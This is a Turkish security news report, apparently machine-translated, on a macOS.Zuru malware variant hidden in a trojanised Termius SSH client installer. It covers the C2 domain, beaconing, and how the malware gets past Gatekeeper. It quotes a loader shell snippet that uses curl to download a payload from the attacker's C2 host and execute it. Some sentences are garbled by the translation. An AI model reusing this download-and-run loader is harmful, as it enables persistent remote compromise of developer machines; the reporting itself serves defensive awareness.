Uzun süredir devam eden macOS.Zuru ailesinin yeni bir zorlaması ortaya çıktı, popüler Terdius SSH müşterisinin doktorunun içinde saklanıyor ve sessizce geliştirici iş istasyonlarını uzaktan dayanaklara dönüştürdü.
İlk olarak Mayıs 2025’in sonlarında görülen 248 MB Rogue disk görüntüsü, gerçek yükleyici gibi görünüyor ve davranıyor, ancak gizli bir şekilde Termius yardımcı paketine 25 MB Mach-O ikili yerleştiriyor.
Bir kez başlatıldıktan sonra, sahte yardımcısı meşru çalıştırır .Termius Helper1 Dublajlı bir yükleyici yumurtlarken normal UX’i korumak için .localizeddeğiştirilmiş bir Khepri komut ve kontrol işaretini düşüren /tmp/.fseventsd ve operatörünü 53 bağlantı noktasında her beş saniyede bir yok etmeye başlar.
Polyswarm analistleri örneğin C2 modelini belirledi –ctl01.macnavicat[.]com Baidu tuzak alanı ile – daha önceki Zuru altyapısına bağlanıyor.
İmplant, Termius’un geliştirici imzasını geçici olarak takas ettiğinden, Gatekeeper’ın güven modeli yan ve demetin noterizasyon iletişim kutuları olmadan yürütülmesine izin verilir.
Macos. başarı
Kampanya, özellikle üçüncü taraf terminalleri tercih eden BT personelini ve yazılım mühendislerini, korsan veya kurcalanmış üretkenlik uygulamalarının getirdiği artan riskin altını çiziyor.
Veri hırsızlığının ötesinde, gelişmiş Beacon keyfi dosyaları aktarabilir, kabuk talimatlarını çalıştırabilir ve çıktıyı yakalayabilir, operatörlere uzlaşmış MAC’lerin kalıcı, yüksek maddi kontrolü sağlayabilir.
Bu raporun geri kalanı, Zuru’nun en son yapısını hem zor hem de esnek hale getiren enfeksiyon mekanizmasına giriyor.
Yükleyicinin ilk görevi bütünlük doğrulamasıdır. Yerleşik Beacon’un bir MD5 karmasını hesaplar ve sonuç sabit kodlu sağlama toplamından ayrılırsa, kullanıcının oturumuna geri zemelemeden önce sessizce C2’den yeniler.
Mantık kompakt ama etkili:-
EXPECTED_HASH=\"8ac593fbe69ae93de505003eff446424\"
CURRENT_HASH=$(md5 -q /tmp/.fseventsd/Khepri)
[ \"$CURRENT_HASH\" != \"$EXPECTED_HASH\" ] && curl -s \
http://ctl01.macnavicat.com/update -o /tmp/.fseventsd/Khepri
chmod +x /tmp/.fseventsd/Khepri && /tmp/.fseventsd/Khepri &Bu kendi kendini iyileştirme adımı, yükün her zaman bozulmamış olmasını sağlayarak temel dosya tabanlı tespitleri engeller.
Beş saniyelik kalp atışı ve arka plan-deemon modu geçişiyle birleştiğinde Zuru, yeniden başlatmalarda bile düşük gecikme erişimi sürdürür ve tek bir uzlaşmış yardımcı programın MacOS merkezli mühendislik ekipleri için tam ölçekli ağ pozlamasına nasıl girebileceğini vurgular.
Tespiti artırın, uyarı yorgunluğunu azaltın, yanıtı hızlandırın; Güvenlik ekipleri için inşa edilmiş etkileşimli bir sanal alan ile hepsi -> Herhangi bir deneyin.